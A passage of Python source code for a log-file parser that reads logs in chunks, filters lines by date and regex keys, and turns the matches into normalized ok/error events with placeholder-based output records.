[self.line_start[0], self.line_end[0], self.length[0]]\n else:\n return None\n\n\nclass ClsResList:\n \"\"\" This class is a container for result information\n in form of properties.\n\n It is initialized by a result list and creates\n properties of it.\n \"\"\"\n\n def __init__(self, res_list):\n self.__r_list = res_list\n if self.__r_list:\n assert isinstance(self.__r_list, list)\n\n @property\n def list(self):\n return self.__r_list\n\n @property\n def length(self):\n return len(self.__r_list)\n\n @property\n def status_tuples(self):\n s_count = {}\n for r in self.__r_list:\n if r['status'] not in s_count:\n s_count[r['status']] = 1\n else:\n s_count[r['status']] += 1\n # sort keys for output\n s_list = []\n for k, v in s_count.items():\n s_list.append((k, v))\n s_list.sort()\n return s_list\n\n def filter(self, *, status_list=None) -> list:\n \"\"\"\n This function filters the list of normalized combi items (events)\n for a given list of status\n\n :param status_list: Status list which events are filtered for\n :return: Filtered list of normalized combi items (events)\n \"\"\"\n if status_list:\n return [r for r in self.__r_list if r['status'] in status_list]\n else:\n return self.__r_list\n\n\nclass ClsEnvTuples:\n \"\"\" This class is a container for environment information\n in form of tuples.\n \"\"\"\n\n def __init__(self):\n self.__list = []\n if socket.gethostname().find('.') >= 0:\n self.__list.append((PH_SOURCE_HOST, socket.gethostname()))\n self.__list.append((PH_SOURCE_HOST_SHORT, socket.gethostname().split('.')[0]))\n else:\n self.__list.append((PH_SOURCE_HOST, socket.gethostbyaddr(socket.gethostname())[0]))\n self.__list.append((PH_SOURCE_HOST_SHORT, socket.gethostname()))\n self.__list.append((PH_SOURCE_SYSTEM, platform.system()))\n self.__list.append((PH_PYTHON_COMPILER, platform.python_compiler()))\n self.__list.append((PH_PYTHON_VERSION, platform.python_version()))\n self.__list.append((PH_PYTHON_IMPLEMENTATION, platform.python_implementation()))\n self.__list.append((PH_PYTHON_SCRIPT, sys.argv[0]))\n\n @property\n def list(self):\n return self.__list\n\n\nclass ClsParser:\n \"\"\" This class is a container for any parser instance.\n A parser is meant to do the parsing of\n a dedicated log object.\n \"\"\"\n\n def __init__(self, dict_log, dict_parser, logger):\n # log\n self.__dict_log = dict_log\n self.__log_id = dict_log['id']\n self.__log_environment = dict_log['environment']\n self.__log_business_area = dict_log['businessArea']\n self.__log_name = dict_log['name']\n self.__log_type = dict_log['type']\n self.__log_pathname = dict_log['pathName']\n self.__log_filename = dict_log['fileName']\n self.__log_file_path = dict_log['pathName'] + '/' + dict_log['fileName']\n self.__log_file_lines_number = self.get_log_lines_number()\n self.__log_date_exists = dict_log['date']['exists']\n self.__log_date_format = dict_log['date']['format']\n self.__log_date_regex = dict_log['date']['regex']\n # parser\n self.__dict_parser = dict_parser\n self.__parser_id = dict_parser['id']\n self.__parser_text = dict_parser['text']\n # - chunk\n try:\n self.__parser_chunk_size = dict_parser['selection']['chunk']['size']\n if self.__parser_chunk_size > self.__log_file_lines_number:\n self.__parser_chunk_size = self.__log_file_lines_number\n except TypeError:\n self.__parser_chunk_size = 100000\n except AttributeError:\n self.__parser_chunk_size = 100000\n try:\n self.__parser_chunk_number = abs(dict_parser['selection']['chunk']['number'])\n if self.__parser_chunk_number * 
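`ClsResList.status_tuples` above counts statuses with a hand-rolled dict; `collections.Counter` does the same in one expression. A sketch over the same item shape:

```python
from collections import Counter

def status_tuples(results):
    # results: list of dicts each carrying a 'status' key, as in ClsResList
    return sorted(Counter(r['status'] for r in results).items())

assert status_tuples([{'status': 'ok'}, {'status': 'error'}, {'status': 'ok'}]) == [('error', 1), ('ok', 2)]
```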
self.__parser_chunk_size > self.__log_file_lines_number:\n self.__parser_chunk_number = self.__log_file_lines_number // self.__parser_chunk_size\n except TypeError:\n self.__parser_chunk_number = 0 # 0 - all chunks\n except AttributeError:\n self.__parser_chunk_number = 0 # 0 - all chunks\n try:\n self.__parser_chunk_offset = dict_parser['selection']['chunk']['offset']\n isinstance(self.__parser_chunk_offset, int)\n if abs(self.__parser_chunk_offset * self.__parser_chunk_size) > self.__log_file_lines_number:\n if self.__parser_chunk_offset > 0:\n self.__parser_chunk_offset = self.__log_file_lines_number // self.__parser_chunk_size\n else:\n self.__parser_chunk_offset = -1 * (self.__log_file_lines_number // self.__parser_chunk_size)\n if self.__parser_chunk_offset < 0:\n if self.__parser_chunk_number > abs(self.__parser_chunk_offset):\n self.__parser_chunk_number = abs(self.__parser_chunk_offset)\n except TypeError:\n self.__parser_chunk_offset = 0\n self.__parser_chunk_index = self.__parser_chunk_offset\n self.__parser_chunk_count = self.__parser_chunk_number\n self.__parser_mode_id = dict_parser['mode']['id']\n try:\n self.__parser_mode_keys_text = dict_parser['mode']['keys']['text']\n self.__parser_mode_keys_group = dict_parser['mode']['keys']['group']\n self.__parser_mode_interval = dict_parser['mode']['interval']\n except KeyError:\n self.__parser_mode_keys_text = []\n self.__parser_mode_keys_group = 0\n self.__parser_mode_interval = {'hours': 0}\n self.__parser_regex_positive = dict_parser['regex']['positive'] == 'yes'\n self.__parser_regex = dict_parser['regex']['text']\n self.__parser_key_level = dicttools.count_key_level(dict_parser, KEY_KEYS)\n self.__parser_search_col = self.search_list()\n self.__parser_filter_time = dict_parser['selection']['time']['active'] == 'yes'\n self.__parser_filter_status = dict_parser['selection']['status']\n self.__parser_time_offset = self.get_parser_time_offset()\n self.__parser_time_interval = self.get_time_interval()\n self.__parser_const_status_ok = self.__dict_parser['result']['constants']['status']['ok']\n self.__parser_const_status_error = self.__dict_parser['result']['constants']['status']['error']\n self.__parser_const_status_warning = self.__dict_parser['result']['constants']['status']['warning']\n self.__parser_dt_start = datetime.datetime.now() + datetime.timedelta(**self.__parser_time_offset)\n self.__parser_dt_end = self.__parser_dt_start + datetime.timedelta(**self.__parser_time_interval)\n if re.search(r'(-?\\d*):(-?\\d*):(\\d*)', dict_parser['selection']['group']['slice']):\n self.__parser_group_slice = dict_parser['selection']['group']['slice']\n else:\n self.__parser_group_slice = '-1::' # default - last element\n self.__parser_result_fields = dict_parser['result']['fields']\n self.env_tuples = ClsEnvTuples()\n if 'file' in dict_parser['out']:\n self.__parser_result_file_path = dict_parser['out']['file']['pathName'] + '/' + \\\n dict_parser['out']['file']['fileName']\n self.__parser_result_file_path = self.__parser_result_file_path.replace(PH_PARSER_ID, self.__parser_id)\n if 'http' in dict_parser['out']:\n self.__parser_http_out_chunk_key = dict_parser['out']['http']['chunkKey']\n self.__parser_http_out_time_factor = dict_parser['out']['http']['timeFactor']\n if 'mail' in dict_parser['out']:\n self.__parser_mail_out_chunk_key = dict_parser['out']['mail']['chunkKey']\n self.__parser_mail_out_time_factor = dict_parser['out']['mail']['timeFactor']\n\n # logger\n self.__logger = logger\n\n @property\n def result_file_path(self):\n 
return self.__parser_result_file_path\n\n @property\n def http_out_chunk_key(self):\n try:\n assert isinstance(self.__parser_http_out_chunk_key, str)\n return self.__parser_http_out_chunk_key\n except AssertionError:\n return None\n\n @property\n def http_out_time_factor(self):\n try:\n assert isinstance(self.__parser_http_out_time_factor, int)\n return self.__parser_http_out_time_factor\n except AssertionError:\n return None\n\n @property\n def log_date_exists(self):\n try:\n assert isinstance(self.__log_date_exists, str)\n return self.__log_date_exists\n except AssertionError:\n return None\n\n @property\n def log_file_path(self):\n try:\n assert isinstance(self.__log_file_path, str)\n return self.__log_file_path\n except AssertionError:\n return None\n\n def get_log_lines_number(self):\n \"\"\"\n Get the number of lines in log file.\n :return: The number of lines in log file.\n \"\"\"\n line_counter = 0\n with open(self.log_file_path, 'r') as fh:\n for _ in fh:\n line_counter += 1\n return line_counter\n\n def get_chunk(self, n=0):\n \"\"\"\n Get the next chunk from logfile or if given the n-th chunk.\n\n :param n: optional parameter for the n-th chunk to obtain\n :return: Dictionary containing the next or n-th chunk of logfile\n - number: line number of logfile\n - date: line date if existing\n - text: line text\n\n \"\"\"\n chunk = []\n line_counter = 0\n\n if n > 0:\n chunk_no = n - 1\n else:\n chunk_no = self.__parser_chunk_index\n self.__parser_chunk_index += 1\n # check number of requested chunks has already been reached\n if self.__parser_chunk_number == 0:\n return None\n else:\n self.__parser_chunk_number -= 1\n\n if chunk_no >= 0:\n chunk_line_start = (chunk_no * self.__parser_chunk_size) + 1\n else:\n chunk_line_start = self.__log_file_lines_number + (chunk_no * self.__parser_chunk_size) + 1\n chunk_line_end = chunk_line_start + self.__parser_chunk_size - 1\n\n with open(self.__log_file_path, 'r') as fh:\n for line in fh:\n line_counter += 1\n item = {}\n if line_counter in range(chunk_line_start, chunk_line_end + 1):\n item['number'] = line_counter\n item['date'] = self.get_datetime(line)\n item['text'] = line\n chunk.append(item)\n\n return chunk\n\n def filter_chunk(self, chunk, filter_type):\n \"\"\"\n Filter a chunk of lines for defined criteria like date range or key words.\n\n :param chunk: chunk of lines from logfile\n :param filter_type: 'date' - filter for lines in datetime range\n 'keys' - filter for the keys\n :return: List containing the filtered lines\n \"\"\"\n filtered_chunk = []\n take_item = False # don't take items until the first item with a date is compliant\n if filter_type == 'date':\n if self.log_date_exists:\n for item in chunk:\n if item['date']:\n if self.in_time_range(item):\n filtered_chunk.append(item)\n take_item = True # switch take_item ON to take subsequent items without date\n elif take_item:\n take_item = False # switch take_item OFF to ignore subsequent items without date\n elif take_item:\n filtered_chunk.append(item)\n else:\n if filter_type == 'keys':\n for item in chunk:\n if self.in_search_list(item['text']):\n filtered_chunk.append(item)\n return filtered_chunk\n\n def has_dates(self):\n \"\"\"\n Evaluates if log file lines contain datetime values\n :return: True if log file lines contain datetime values\n \"\"\"\n return self.log_date_exists == 'yes'\n\n def get_datetime(self, line):\n \"\"\"\n Extracts the datetime from a line string based\n on a regular expression search\n :param line: String 
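`get_chunk` above re-opens and scans the whole log file for every chunk it returns. For purely sequential chunking, `itertools.islice` over a single open handle yields the same numbered chunks in one pass; a sketch of the pattern (not the class's API):

```python
from itertools import islice

def iter_chunks(path, chunk_size):
    """Yield lists of (line_number, text) pairs, at most chunk_size lines each."""
    with open(path, 'r') as fh:
        numbered = enumerate(fh, start=1)
        while True:
            chunk = list(islice(numbered, chunk_size))
            if not chunk:
                break
            yield chunk
```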
containing a datetime\n :return: datetime or None\n \"\"\"\n try:\n m = re.search(self.__log_date_regex, line)\n dt_string = m.group(0)\n dt = datetime.datetime.strptime(dt_string, self.__log_date_format)\n assert isinstance(dt, datetime.datetime)\n return dt\n except TypeError:\n return None\n except AttributeError:\n return None\n\n def get_parser_time_offset(self):\n \"\"\"\n Get the time offset for line selection.\n If nothing is specified, take a default of -99998 days\n\n :return: time offset as key value pair\n \"\"\"\n time_offset = dict()\n\n try:\n datetime.timedelta(**self.__dict_parser['selection']['time']['offset'])\n time_offset = self.__dict_parser['selection']['time']['offset']\n except TypeError:\n time_offset['days'] = -99998\n return time_offset\n\n def get_time_interval(self):\n \"\"\"\n Get the time interval for line selection.\n If nothing is specified, take a default of 99999 days\n\n :return: time interval as key value pair\n \"\"\"\n time_interval = dict()\n try:\n datetime.timedelta(**self.__dict_parser['selection']['time']['interval'])\n time_interval = self.__dict_parser['selection']['time']['interval']\n except TypeError:\n time_interval['days'] = 99999\n return time_interval\n\n def in_time_range(self, item):\n \"\"\"\n Looks if item is within a time range defined by\n self.__parser_dt_start and self.__parser_dt_end\n\n :param item: Item is a dictionary representing one line of logfile\n with some additional attributes.\n :return: true if extracted datetime is in time range,\n otherwise false\n \"\"\"\n if self.has_dates():\n try:\n return self.__parser_dt_start <= item['date'] <= self.__parser_dt_end\n except TypeError:\n return False\n else:\n return False\n\n def search_list(self):\n \"\"\"\n Build a list of all search key combinations including the regex.\n The maximum level of nested keys is 4.\n\n :return: List with each item containing three lists\n - in: list of search strings\n - out: list of translated search strings\n - regex: regular expression for search\n \"\"\"\n combi_list = []\n\n def compose_result(in_lst, out_lst, rx, rx_dt):\n \"\"\"\n This sub function composes the final search list.\n It's useful, as it can be called at different places\n depending on the level of nested keys in configuration.\n :param in_lst: list of search strings\n :param out_lst: list of translated search strings\n :param rx: regex pattern for line search\n :param rx_dt: regex pattern for date search\n :return: Dictionary item containing\n - in: list of search strings\n - out: list of translated search strings\n - regex: regular expression for search\n \"\"\"\n result_item = {}\n\n rx = rx.replace(PH_DATE, rx_dt)\n for i in range(0, len(in_lst)):\n rx = rx.replace('%k' + str(i + 1) + '%', in_lst[i])\n\n result_item['in'] = in_lst\n result_item['out'] = out_lst\n result_item['regex'] = rx\n\n return result_item\n\n if KEY_KEYS in self.__dict_parser.keys():\n\n for k1 in self.__dict_parser[KEY_KEYS]:\n # re-initialize for every 1st level key\n in_list = []\n out_list = []\n in_list.append(k1['text'])\n out_list.append(k1['out'])\n if KEY_KEYS in k1.keys():\n for k2 in k1[KEY_KEYS]:\n # re-initialize with preserving above level information\n in_list = in_list[:1]\n out_list = out_list[:1]\n in_list.append(k2['text'])\n out_list.append(k2['out'])\n if KEY_KEYS in k2.keys():\n for k3 in k2[KEY_KEYS]:\n # re-initialize with preserving above level information\n in_list = in_list[:2]\n out_list = out_list[:2]\n in_list.append(k3['text'])\n out_list.append(k3['out'])\n 
if KEY_KEYS in k3.keys():\n for k4 in k3[KEY_KEYS]:\n # re-initialize with preserving above level information\n in_list = in_list[:3]\n out_list = out_list[:3]\n in_list.append(k4['text'])\n out_list.append(k4['out'])\n combi_list.append(compose_result(in_list, out_list, self.__parser_regex,\n self.__log_date_regex))\n else:\n combi_list.append(\n compose_result(in_list, out_list, self.__parser_regex, self.__log_date_regex))\n else:\n combi_list.append(\n compose_result(in_list, out_list, self.__parser_regex, self.__log_date_regex))\n else:\n combi_list.append(compose_result(in_list, out_list, self.__parser_regex, self.__log_date_regex))\n\n return combi_list\n\n def in_search_list(self, line):\n \"\"\"\n Check if line meets parser regex list.\n :param line: line of logfile\n :return: Return True if line meets parser regex list.\n \"\"\"\n in_list = False\n for item in self.__parser_search_col:\n if re.search(item['regex'], line):\n in_list = True\n break\n return in_list\n\n def combi_list(self, chunk):\n \"\"\"\n This function extends search list items with the found items.\n :param chunk: List of filtered items, each of which containing\n - number: line number\n - date: date of line\n - text: text of line\n :return: List containing the search items together with the found items.\n \"\"\"\n combi_list = []\n for search_item in self.__parser_search_col:\n found_list = []\n for found_item in chunk:\n if re.search(search_item['regex'], found_item['text']):\n found_list.append(found_item)\n # post process found_list\n # slice the list in order to get only defined items\n # -1:None:None for only the last item\n found_list = self.sliced_list(found_list, self.__parser_group_slice)\n\n # add found_list to search_item\n search_item['found'] = found_list\n combi_list.append(search_item)\n\n return combi_list\n\n def combi_list_normalized(self, clist):\n \"\"\"\n This function normalizes the combi list by transforming items with\n multiple found items into items with one result for one or more found items.\n Thus the normalized combi list will contain more items then the input combi list.\n\n The objective is to have items also in the case of searches not being successful,\n where the found list is empty. 
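`search_list` above supports at most four nested `keys` levels through hardcoded loops; a recursive generator removes that limit. A hedged sketch yielding the same leaf-level (in, out) key paths from the same dictionary shape:

```python
KEY_KEYS = 'keys'

def key_paths(node, ins=(), outs=()):
    """Yield (in_list, out_list) for every leaf path of nested 'keys' entries."""
    for child in node.get(KEY_KEYS, []):
        new_ins, new_outs = ins + (child['text'],), outs + (child['out'],)
        if KEY_KEYS in child:
            yield from key_paths(child, new_ins, new_outs)  # descend one level
        else:
            yield list(new_ins), list(new_outs)             # leaf: emit the path
```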
In any case there will be a status and a message.\n\n :param clist: List containing the search items together with the found items.\n - regex: regular expression for search\n - in: keys for search\n - out: keys for output\n - found: list of dicts\n - number: line number\n - date: date of line\n - text: text of line\n :return: List containing the normalized combi list.\n - regex: regular expression for search\n - in: list of keys for search\n - out: list of keys for output\n - number: line number\n - date: date of line\n - status: event status (ok, error)\n - text: found text\n - message: event message\n \"\"\"\n combi_list_normalized = []\n for citem in clist:\n if self.__parser_regex_positive:\n # regex search looks for positive events\n if citem['found']:\n # positive events found\n if self.__parser_mode_id == 1:\n # single mode\n for fitem in citem['found']:\n cin = {} # combi item normalized\n for k in citem.keys():\n if k == 'found':\n cin['number'] = fitem['number']\n cin['date'] = fitem['date']\n cin['status'] = self.__parser_const_status_ok\n cin['text'] = fitem['text']\n cin['message'] = fitem['text']\n else:\n cin[k] = citem[k]\n combi_list_normalized.append(cin)\n else:\n if self.__parser_mode_id == 2:\n # multi mode - all found items (steps) shall result in in one item (event)\n cin = self.multi_item_normalized(citem, self.__parser_mode_keys_text,\n self.__parser_mode_keys_group)\n # Check if a valid event has been returned.\n # None means, the multi step event has not been finished yet, hence no adding to the list.\n if not (cin is None):\n combi_list_normalized.append(cin)\n else:\n # positive events not found\n cin = {} # combi item normalized\n for k in citem.keys():\n if k == 'found':\n cin['number'] = None\n cin['date'] = datetime.datetime.now()\n cin['status'] = self.__parser_const_status_error\n cin['text'] = None\n cin['message'] = 'Not found: ' + citem['regex']\n else:\n cin[k] = citem[k]\n combi_list_normalized.append(cin)\n else:\n # regex search looks for negative events\n if citem['found']:\n # negative events found\n if self.__parser_mode_id == 1:\n # single mode\n for fitem in citem['found']:\n cin = {} # combi item normalized\n for k in citem.keys():\n if k == 'found':\n cin['number'] = fitem['number']\n cin['date'] = fitem['date']\n cin['status'] = self.__parser_const_status_error\n cin['text'] = fitem['text']\n cin['message'] = fitem['text']\n else:\n cin[k] = citem[k]\n combi_list_normalized.append(cin)\n else:\n # negative events not found\n cin = {} # combi item normalized\n for k in citem.keys():\n if k == 'found':\n cin['number'] = None\n cin['date'] = datetime.datetime.now()\n cin['status'] = self.__parser_const_status_ok\n cin['text'] = None\n cin['message'] = 'Not found: ' + citem['regex']\n else:\n cin[k] = citem[k]\n combi_list_normalized.append(cin)\n\n return combi_list_normalized\n\n def multi_item_normalized(self, citem, evtlist, rgroup):\n \"\"\"\n This function normalizes one combi list item by evaluating multiple found items.\n The objective is to consolidate found items each representing a defined step of a\n multi step event (e.g. 
START, END) into one resulting normalized combi list item.\n\n In case that there is one step missing or the number of the steps does not match,\n the status will become error.\n\n :param citem: One item of the combi list containing found items each representing\n one step of a multi step event.\n :param evtlist: List of multiple keywords each representing one step of a\n multiple step event.\n :param rgroup: The regex group where the key of the evtlist is contained.\n :return: One normalized combi list item or None, if the multiple step event is incomplete\n and lies within the allowed maximum time interval\n \"\"\"\n\n def step_counts_equal(scounter) -> bool:\n \"\"\"\n Check if all step counts are equal\n :rtype : bool\n :param scounter: step counter\n :return: True if all step counts are equal\n \"\"\"\n i = None\n for _, v in scounter:\n if not i:\n i = v\n else:\n if not i == v:\n return False\n return True\n\n def steps_in_order(citm, elist, rgrp) -> bool:\n \"\"\"\n Check if event steps are in order.\n :param citm: One item of the combi list containing found items each representing\n one step of a multi step event.\n :param elist: List of multiple keywords each representing one step of a\n multiple step event.\n :param rgrp: The regex group where the key of the evtlist is contained.\n :return: True if all event steps are in order\n \"\"\"\n # check if there is an item 'date' in the found item list\n # if not, return steps_in_order=True\n if not citm['found'][0]['date']:\n return True\n\n # get a found item list sorted by date ascending\n c_item_found_sorted = sorted(citm['found'], key=itemgetter('date'))\n\n # slice last n items of found items\n # n is number of event steps\n slice_str = '-' + str(len(elist)) + '::'\n c_item_found_sliced = self.sliced_list(c_item_found_sorted, slice_str)\n\n str_last_item_date = None\n assert isinstance(c_item_found_sliced, list)\n i = 0\n for f in c_item_found_sliced:\n if str_last_item_date:\n if not f['date'] == str_last_item_date:\n rs = re.search(citem['regex'], f['text'])\n if not re.search(elist[i], rs.group(rgrp)):\n return False\n else:\n str_last_item_date = f['date']\n i += 1\n return True\n \n def steps_in_timerange(citm, interval) -> bool:\n \"\"\"\n Check if event steps are in the allowed step interval.\n The latest step is assumed to be not older than the maximum allowed time between two steps.\n :param citm: One item of the combi list containing found items each representing\n one step of a multi step event.\n :param interval: Maximum allowed time between two steps.\n :return: True if latest step is not older than interval\n \"\"\"\n # check if there is an item 'date' in the found item list\n # if not, return steps_in_order=True\n if not citm['found'][0]['date']:\n return True\n\n # get a found item list sorted by date ascending\n c_item_found_sorted = sorted(citm['found'], key=itemgetter('date'))\n\n str_last_item_date = None\n assert isinstance(c_item_found_sorted, list)\n for f in c_item_found_sorted:\n str_last_item_date = f['date']\n\n # check date against now\n # if latest item date is not older than the step interval, then return true\n # dt = datetime.datetime.strptime(str_last_item_date, self.__log_date_format)\n try:\n return str_last_item_date + datetime.timedelta(**interval) > datetime.datetime.now()\n except TypeError:\n return False\n\n # count steps for every step type of the multi step event (e.g. 
START, END)\n step_counter = [] # list of event count tuples (event_key, count)\n for eitem in evtlist:\n count = 0\n for fitem in citem['found']:\n m = re.search(citem['regex'], fitem['text'])\n if re.search(eitem, m.group(rgroup)):\n count += 1\n step_counter.append((eitem, count))\n\n # build normalized combi item\n cin = {} # combi item normalized\n\n error_step_order = ''\n if step_counts_equal(step_counter):\n if steps_in_order(citem, evtlist, rgroup):\n status = self.__parser_const_status_ok\n else:\n # at least one step is missing, maybe due to a multi step process still not finished\n # check if latest step is not older than the allowed process time per step\n if steps_in_timerange(citem, self.__parser_mode_interval):\n # multi step event is incomplete but within max allowed time interval\n return None\n else:\n status = self.__parser_const_status_error\n error_step_order = ' error: steps not in order!'\n else:\n # at least one step is missing, maybe due to a multi step process still not finished\n # check if latest step is not older than the allowed process time per step\n if steps_in_timerange(citem, self.__parser_mode_interval):\n # multi step event is incomplete but within max allowed time interval\n return None\n else:\n status = self.__parser_const_status_error\n\n for k in citem.keys():\n if k == 'found':\n m = re.search(citem['regex'], citem[k][-1]['text'])\n cin['number'] = citem[k][-1]['number']\n if citem[k][-1]['date']:\n cin['date'] = citem[k][-1]['date']\n else:\n cin['date'] = datetime.datetime.now()\n cin['status'] = status\n cin['text'] = m.group(0)\n cin['message'] = m.group(0) + ' (step counter: ' + format(step_counter) + ', ' + error_step_order + ')'\n else:\n cin[k] = citem[k]\n\n return cin\n\n @staticmethod\n def sliced_list(org_list, slice_str):\n \"\"\" Reduce the number of list items by slice.\n\n :param org_list: List to be sliced\n :param slice_str: String telling how to slice\n :return: Sliced list\n \"\"\"\n o_list = org_list\n m = re.search(r'(-?\\d*):(-?\\d*):(\\d*)', slice_str)\n x, y, z = m.groups(None)\n\n try:\n x = int(x)\n except ValueError:\n x = None\n try:\n y = int(y)\n except ValueError:\n y = None\n try:\n z = int(z)\n except ValueError:\n z = None\n\n sliced_list = o_list[x:y:z]\n return sliced_list\n\n def result_tuples(self, citem):\n \"\"\" This function builds result tuples.\n The result tuples contain placeholders as keys\n and the respective values. They will be used for building the\n result dictionary by replacing placeholders by values.\n\n The background is, that the result dictionary may contain nested\n elements like another dictionary. 
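`sliced_list` above parses a 'start:stop:step' string with a regex and three int casts; Python's built-in `slice` object carries the same triple. A sketch:

```python
def parse_slice(spec: str) -> slice:
    """Turn a 'start:stop:step' string (any part may be empty) into a slice object."""
    parts = [int(p) if p else None for p in spec.split(':')]
    parts += [None] * (3 - len(parts))  # tolerate 'start:stop' style specs
    return slice(*parts[:3])

assert [1, 2, 3, 4][parse_slice('-1::')] == [4]      # the parser's default: last item
assert [1, 2, 3, 4][parse_slice('1:3:')] == [2, 3]
```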
The result tuple is a flat result set\n for collecting the results and serves as a kind of intermediate result.\n\n Example:\n ('%k1%', 'AZSE') - key is the placeholder '%k1%', value is 'AZSE'\n\n :param citem: Normalized combi item containing search and found items\n :return: tuples list containing the results\n \"\"\"\n # time\n # date\n date_now = datetime.datetime.now()\n if citem['date'] is None:\n event_date = datetime.datetime.now()\n else:\n event_date = citem['date']\n # time factor\n try:\n time_factor = int(self.http_out_time_factor)\n except AttributeError:\n time_factor = 1\n\n # tuple list\n tuple_list_all = []\n tuple_list = [(PH_ENVIRONMENT, self.__log_environment), (PH_BUSINESS_AREA, self.__log_business_area),\n (PH_PARSER_ID, self.__parser_id), (PH_PARSER_REGEX, citem['regex']),\n (PH_SOURCEFILE, self.__log_file_path), (PH_SOURCE_LINE_NUM, str(citem['number'])),\n (PH_CONFIGFILE, CONFIG_FILE), (PH_EVENT_STATUS, citem['status']),\n (PH_DATE_NOW, int(time.mktime(date_now.timetuple()) * time_factor)),\n (PH_EVENT_DATE, int(time.mktime(event_date.timetuple()) * time_factor)),\n (PH_EVENT_MESSAGE, str(citem['message']))]\n # environment details\n for k, v in self.env_tuples.list:\n tuple_list.append((k, v))\n # out keys %k..%\n for i, o in enumerate(citem['out'], start=1):\n tuple_list.append(('%k' + str(i) + '%', o))\n # tuple_list.append(('%k' + str(i) + '.lower%', str(o).lower()))\n # regex groups %g..%\n if citem['text']:\n m = re.search(citem['regex'], citem['text'])\n for i, r in enumerate(m.groups(), start=1):\n if i > 0:\n tuple_list.append(('%g' + str(i) + '%', r))\n else:\n for i in range(1, 10):\n tuple_list.append(('%g' + str(i) + '%', 'None'))\n\n for k, v in tuple_list:\n tuple_list_all.append((k, v)) # original tuple\n # lower and upper case tuples\n if isinstance(v, str):\n tuple_list_all.append((VAR_DELIMITER + k.strip(VAR_DELIMITER) + '.lower' + VAR_DELIMITER, v.lower()))\n tuple_list_all.append((VAR_DELIMITER + k.strip(VAR_DELIMITER) + '.upper' + VAR_DELIMITER, v.upper()))\n else: # keep it unchanged\n tuple_list_all.append((VAR_DELIMITER + k.strip(VAR_DELIMITER) + '.lower' + VAR_DELIMITER, v))\n tuple_list_all.append((VAR_DELIMITER + k.strip(VAR_DELIMITER) + '.upper' + VAR_DELIMITER, v))\n\n return tuple_list_all\n\n @staticmethod\n def fill_placeholders(obj_dict, tuple_list):\n \"\"\"\n Copy the dictionary obj_dict and replace placeholders with\n values from tuple_list\n :param obj_dict: Dictionary which serves as a pattern for the dictionary to return.\n :param tuple_list: Tuple list containing tuples of keys with names that equal the placeholder\n names in obj_dict and values that shall replace the placeholders.\n :return: Dictionary with values instead of placeholders\n \"\"\"\n resdict = copy.deepcopy(obj_dict)\n for key_map in dicttools.key_sequences(resdict):\n for k, v in tuple_list:\n dict_value_old = str(dicttools.get_from_dict(resdict, key_map))\n if re.search(k, dict_value_old):\n try:\n dict_value_new = dict_value_old.replace(k, v)\n except TypeError:\n dict_value_new = v # number\n dicttools.set_from_dict(resdict, key_map, dict_value_new)\n return resdict\n\n @property\n def result_list(self):\n \"\"\"\n This function gets the parser result as a list of dictionaries.\n\n :return: Parser result list of dictionaries\n \"\"\"\n chunks_accumulated = []\n result_list = []\n search_list = self.search_list()\n intend = LOG_INTEND * ' '\n print('parser: {}'.format(self.__parser_id))\n print('search list: size: {}\\n'.format(len(search_list)))\n 
self.__logger.info('Search for ' + str(len(search_list)) + ' regular expression patterns in the log file.')\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Search patterns:')\n for s_item in search_list:\n self.__logger.debug(intend + s_item['regex'])\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Processing chunks of the log file.')\n i = 0\n while True:\n # Get file content chunk wise to save memory\n # A chunk contains a number of lines defined in config file via chunksize.\n chunk = ClsChunk(self.get_chunk())\n if not chunk.list:\n break\n i += 1\n self.__logger.debug('{} {:>2}:'.format('Chunk', i))\n self.__logger.debug('{:>12} {}'.format('original:', chunk.log_info))\n print('chunk start: {}, end: {}, size: {}'.format(chunk.line_start, chunk.line_end, chunk.length))\n # filter date\n if self.__parser_filter_time:\n self.__logger.debug('Filtering dates ..')\n chunk_filtered_date = ClsChunk(self.filter_chunk(chunk.list, 'date'))\n if not chunk_filtered_date.list:\n self.__logger.debug('{:>12} {}'.format('filtered:', str(None)))\n continue\n self.__logger.debug('{:>12} {}'.format('filtered:', chunk_filtered_date.log_info))\n else:\n chunk_filtered_date = ClsChunk(chunk.list)\n # filter keys\n self.__logger.debug('Filtering keys ..')\n chunk_filtered_keys = ClsChunk(self.filter_chunk(chunk_filtered_date.list, 'keys'))\n if not chunk_filtered_keys.list:\n self.__logger.debug('{:>12} {}'.format('filtered:', str(None)))\n continue\n print('chunk_filtered: size: {}'.format(chunk_filtered_keys.length))\n self.__logger.debug('{:>12} {}'.format('filtered:', chunk_filtered_keys.log_info))\n # add found lines to the accumulated chunk list\n for item in chunk_filtered_keys.list:\n chunks_accumulated.append(item)\n\n # log search result\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Found ' + str(len(chunks_accumulated)) + ' lines in the log file.')\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Found lines:')\n for c_acc in chunks_accumulated:\n self.__logger.debug('{:8}: {}'.format(c_acc['number'], c_acc['text'].rstrip()))\n\n # combi list - combines search and found items\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Combining search and found items in combi list.')\n combi_list = self.combi_list(chunks_accumulated)\n print('combi list: size: {}\\n'.format(len(combi_list)))\n self.__logger.debug('combi list: size: {}'.format(len(combi_list)))\n for c_item in combi_list:\n self.__logger.debug(c_item)\n\n # combi list getting normalized\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Normalizing combi list by consolidating the found items.')\n combi_list_normalized = ClsResList(self.combi_list_normalized(combi_list))\n print('combi list normalized: size: {}\\n'.format(len(combi_list_normalized.list)))\n self.__logger.debug('combi list normalized: size: {}'.format(combi_list_normalized.length))\n for c_item in combi_list_normalized.list:\n self.__logger.debug(c_item)\n\n # combi list normalized is filtered for status\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Normalized combi list is filtered for status.')\n combi_list_normalized_filtered = ClsResList(combi_list_normalized.filter(\n status_list=self.__parser_filter_status))\n self.__logger.debug('combi list normalized filtered: size: {}'.format(combi_list_normalized_filtered.length))\n for c_item in combi_list_normalized_filtered.list:\n self.__logger.debug(c_item)\n\n # log the event status\n 
